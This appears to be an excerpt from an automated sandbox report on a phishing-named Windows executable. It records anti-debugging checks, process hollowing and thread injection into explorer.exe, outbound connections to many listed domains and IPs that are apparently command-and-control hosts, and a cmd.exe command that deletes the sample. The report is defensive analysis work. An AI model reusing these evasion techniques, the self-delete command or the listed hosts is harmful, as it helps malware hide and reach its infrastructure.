        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D9240 mov eax, dword ptr fs:[00000030h]10_2_045D9240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D9240 mov eax, dword ptr fs:[00000030h]10_2_045D9240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D9240 mov eax, dword ptr fs:[00000030h]10_2_045D9240
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E7E41 mov eax, dword ptr fs:[00000030h]10_2_045E7E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E7E41 mov eax, dword ptr fs:[00000030h]10_2_045E7E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E7E41 mov eax, dword ptr fs:[00000030h]10_2_045E7E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E7E41 mov eax, dword ptr fs:[00000030h]10_2_045E7E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E7E41 mov eax, dword ptr fs:[00000030h]10_2_045E7E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E7E41 mov eax, dword ptr fs:[00000030h]10_2_045E7E41
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FAE73 mov eax, dword ptr fs:[00000030h]10_2_045FAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FAE73 mov eax, dword ptr fs:[00000030h]10_2_045FAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FAE73 mov eax, dword ptr fs:[00000030h]10_2_045FAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FAE73 mov eax, dword ptr fs:[00000030h]10_2_045FAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FAE73 mov eax, dword ptr fs:[00000030h]10_2_045FAE73
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04664257 mov eax, dword ptr fs:[00000030h]10_2_04664257
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E766D mov eax, dword ptr fs:[00000030h]10_2_045E766D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045F3A1C mov eax, dword ptr fs:[00000030h]10_2_045F3A1C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DAA16 mov eax, dword ptr fs:[00000030h]10_2_045DAA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DAA16 mov eax, dword ptr fs:[00000030h]10_2_045DAA16
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04614A2C mov eax, dword ptr fs:[00000030h]10_2_04614A2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04614A2C mov eax, dword ptr fs:[00000030h]10_2_04614A2C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D5210 mov eax, dword ptr fs:[00000030h]10_2_045D5210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D5210 mov ecx, dword ptr fs:[00000030h]10_2_045D5210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D5210 mov eax, dword ptr fs:[00000030h]10_2_045D5210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D5210 mov eax, dword ptr fs:[00000030h]10_2_045D5210
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E8A0A mov eax, dword ptr fs:[00000030h]10_2_045E8A0A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0468FE3F mov eax, dword ptr fs:[00000030h]10_2_0468FE3F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DC600 mov eax, dword ptr fs:[00000030h]10_2_045DC600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DC600 mov eax, dword ptr fs:[00000030h]10_2_045DC600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DC600 mov eax, dword ptr fs:[00000030h]10_2_045DC600
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04608E00 mov eax, dword ptr fs:[00000030h]10_2_04608E00
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04691608 mov eax, dword ptr fs:[00000030h]10_2_04691608
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460A61C mov eax, dword ptr fs:[00000030h]10_2_0460A61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460A61C mov eax, dword ptr fs:[00000030h]10_2_0460A61C
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DE620 mov eax, dword ptr fs:[00000030h]10_2_045DE620
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046016E0 mov ecx, dword ptr fs:[00000030h]10_2_046016E0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602AE4 mov eax, dword ptr fs:[00000030h]10_2_04602AE4
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04618EC7 mov eax, dword ptr fs:[00000030h]10_2_04618EC7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0468FEC0 mov eax, dword ptr fs:[00000030h]10_2_0468FEC0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602ACB mov eax, dword ptr fs:[00000030h]10_2_04602ACB
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046036CC mov eax, dword ptr fs:[00000030h]10_2_046036CC
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A8ED6 mov eax, dword ptr fs:[00000030h]10_2_046A8ED6
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E76E2 mov eax, dword ptr fs:[00000030h]10_2_045E76E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046546A7 mov eax, dword ptr fs:[00000030h]10_2_046546A7
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A0EA5 mov eax, dword ptr fs:[00000030h]10_2_046A0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A0EA5 mov eax, dword ptr fs:[00000030h]10_2_046A0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A0EA5 mov eax, dword ptr fs:[00000030h]10_2_046A0EA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460FAB0 mov eax, dword ptr fs:[00000030h]10_2_0460FAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466FE87 mov eax, dword ptr fs:[00000030h]10_2_0466FE87
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EAAB0 mov eax, dword ptr fs:[00000030h]10_2_045EAAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EAAB0 mov eax, dword ptr fs:[00000030h]10_2_045EAAB0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460D294 mov eax, dword ptr fs:[00000030h]10_2_0460D294
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460D294 mov eax, dword ptr fs:[00000030h]10_2_0460D294
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D52A5 mov eax, dword ptr fs:[00000030h]10_2_045D52A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D52A5 mov eax, dword ptr fs:[00000030h]10_2_045D52A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D52A5 mov eax, dword ptr fs:[00000030h]10_2_045D52A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D52A5 mov eax, dword ptr fs:[00000030h]10_2_045D52A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D52A5 mov eax, dword ptr fs:[00000030h]10_2_045D52A5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A8F6A mov eax, dword ptr fs:[00000030h]10_2_046A8F6A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DF358 mov eax, dword ptr fs:[00000030h]10_2_045DF358
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04603B7A mov eax, dword ptr fs:[00000030h]10_2_04603B7A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04603B7A mov eax, dword ptr fs:[00000030h]10_2_04603B7A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DDB40 mov eax, dword ptr fs:[00000030h]10_2_045DDB40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EEF40 mov eax, dword ptr fs:[00000030h]10_2_045EEF40
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A8B58 mov eax, dword ptr fs:[00000030h]10_2_046A8B58
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045DDB60 mov ecx, dword ptr fs:[00000030h]10_2_045DDB60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045EFF60 mov eax, dword ptr fs:[00000030h]10_2_045EFF60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FF716 mov eax, dword ptr fs:[00000030h]10_2_045FF716
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460E730 mov eax, dword ptr fs:[00000030h]10_2_0460E730
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A070D mov eax, dword ptr fs:[00000030h]10_2_046A070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A070D mov eax, dword ptr fs:[00000030h]10_2_046A070D
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460A70E mov eax, dword ptr fs:[00000030h]10_2_0460A70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460A70E mov eax, dword ptr fs:[00000030h]10_2_0460A70E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0469131B mov eax, dword ptr fs:[00000030h]10_2_0469131B
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D4F2E mov eax, dword ptr fs:[00000030h]10_2_045D4F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045D4F2E mov eax, dword ptr fs:[00000030h]10_2_045D4F2E
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466FF10 mov eax, dword ptr fs:[00000030h]10_2_0466FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0466FF10 mov eax, dword ptr fs:[00000030h]10_2_0466FF10
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046003E2 mov eax, dword ptr fs:[00000030h]10_2_046003E2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046137F5 mov eax, dword ptr fs:[00000030h]10_2_046137F5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046553CA mov eax, dword ptr fs:[00000030h]10_2_046553CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046553CA mov eax, dword ptr fs:[00000030h]10_2_046553CA
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045FDBE9 mov eax, dword ptr fs:[00000030h]10_2_045FDBE9
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E8794 mov eax, dword ptr fs:[00000030h]10_2_045E8794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04604BAD mov eax, dword ptr fs:[00000030h]10_2_04604BAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04604BAD mov eax, dword ptr fs:[00000030h]10_2_04604BAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04604BAD mov eax, dword ptr fs:[00000030h]10_2_04604BAD
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_046A5BA5 mov eax, dword ptr fs:[00000030h]10_2_046A5BA5
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E1B8F mov eax, dword ptr fs:[00000030h]10_2_045E1B8F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_045E1B8F mov eax, dword ptr fs:[00000030h]10_2_045E1B8F
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0469138A mov eax, dword ptr fs:[00000030h]10_2_0469138A
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0468D380 mov ecx, dword ptr fs:[00000030h]10_2_0468D380
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0460B390 mov eax, dword ptr fs:[00000030h]10_2_0460B390
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04657794 mov eax, dword ptr fs:[00000030h]10_2_04657794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04657794 mov eax, dword ptr fs:[00000030h]10_2_04657794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04657794 mov eax, dword ptr fs:[00000030h]10_2_04657794
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_04602397 mov eax, dword ptr fs:[00000030h]10_2_04602397
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess queried: DebugPortJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeCode function: 4_2_00409F70 LdrLoadDll,4_2_00409F70
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeMemory allocated: page read and write | page guardJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\explorer.exeNetwork Connect: 209.141.38.71 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.iguaym.com
        Source: C:\Windows\explorer.exeDomain query: www.jupiter-directory.info
        Source: C:\Windows\explorer.exeDomain query: www.jamiebakes.net
        Source: C:\Windows\explorer.exeDomain query: www.burntkeroseneblueheelers.com
        Source: C:\Windows\explorer.exeDomain query: www.lingmao08.com
        Source: C:\Windows\explorer.exeNetwork Connect: 15.197.142.173 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.206 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.gsibralstar1.com
        Source: C:\Windows\explorer.exeDomain query: www.popcornpor.xyz
        Source: C:\Windows\explorer.exeNetwork Connect: 172.67.219.19 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.route112mitsubishi.com
        Source: C:\Windows\explorer.exeNetwork Connect: 81.171.22.6 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.tsreaur.com
        Source: C:\Windows\explorer.exeNetwork Connect: 156.226.250.150 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.danilhodoekhi.com
        Source: C:\Windows\explorer.exeDomain query: www.medicaleducationbangladesh.com
        Source: C:\Windows\explorer.exeNetwork Connect: 165.231.150.75 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.heiboard.xyz
        Source: C:\Windows\explorer.exeNetwork Connect: 38.143.25.232 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.expoj3.com
        Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.217 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.shantellonlineshoph.com
        Source: C:\Windows\explorer.exeDomain query: www.funserve.club
        Source: C:\Windows\explorer.exeDomain query: www.pieprop.com
        Source: C:\Windows\explorer.exeDomain query: www.theminercrypto.com
        Source: C:\Windows\explorer.exeDomain query: www.deta-hedman.com
        Source: C:\Windows\explorer.exeNetwork Connect: 37.97.135.188 80Jump to behavior
        Source: C:\Windows\explorer.exeDomain query: www.trustedhomebuying.com
        Source: C:\Windows\explorer.exeNetwork Connect: 34.117.168.233 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 104.16.100.51 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 104.21.27.132 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
        Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.210 80Jump to behavior
        Sample uses process hollowing technique
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 2A0000Jump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Injects a PE file into a foreign processes
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeMemory written: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe base: 400000 value starts with: 4D5AJump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeThread register set: target process: 684Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 684Jump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeProcess created: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe"Jump to behavior
        Source: explorer.exe, 00000005.00000000.519734043.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.478671270.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.523882702.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: explorer.exe, 00000005.00000000.575892287.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.495654942.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.568103308.0000000000E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
        Source: explorer.exe, 00000005.00000000.575892287.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.515259916.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.496277460.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
        Source: explorer.exe, 00000005.00000000.575892287.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.515259916.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.496277460.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\PO-INQUIRY-VALE-SP-2022-60.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
